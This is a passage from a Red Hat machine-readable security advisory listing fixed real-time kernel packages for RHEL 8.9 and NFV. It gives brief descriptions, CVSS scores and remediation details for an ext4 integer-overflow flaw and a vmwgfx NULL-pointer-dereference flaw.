"name": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64 as a component of Red Hat Enterprise Linux for Real Time (v. 8)",
"product_id": "RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"relates_to_product_reference": "RT-8.9.0.Z.MAIN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-33631",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2024-01-30T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2261976"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the openEuler kernel in Linux filesystem modules that allows an integer overflow via mounting a corrupted filesystem. This issue affects the openEuler kernel in versions from 4.19.90 through 4.19.90-2401.3 and 5.10.0-60.18.0 through 5.10.0-183.0.0.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: ext4: kernel bug in ext4_write_inline_data_end()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has protection mechanisms in place against buffer overflows, such as FORTIFY_SOURCE, Position Independent Executables or Stack Smashing Protection.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-33631"
},
{
"category": "external",
"summary": "RHBZ#2261976",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2261976"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-33631",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33631"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33631",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33631"
},
{
"category": "external",
"summary": "https://seclists.org/oss-sec/2024/q1/65",
"url": "https://seclists.org/oss-sec/2024/q1/65"
}
],
"release_date": "2024-01-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: ext4: kernel bug in ext4_write_inline_data_end()"
},
{
"cve": "CVE-2022-38096",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2022-09-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2133452"
}
],
"notes": [
{
"category": "description",
"text": "A NULL pointer dereference issue was found in the Linux kernel\u0027s vmwgfx driver in vmw_cmd_dx_define_query. This flaw allows a local, unprivileged attacker with access to either /dev/dri/card0 or /dev/dri/rendererD128, who can issue an ioctl() on the resulting file descriptor, to crash the system, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Systems making use of the vmwgfx driver are potentially affected by this flaw; systems without the vmwgfx driver loaded are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-38096"
},
{
"category": "external",
"summary": "RHBZ#2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096"
}
],
"release_date": "2022-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
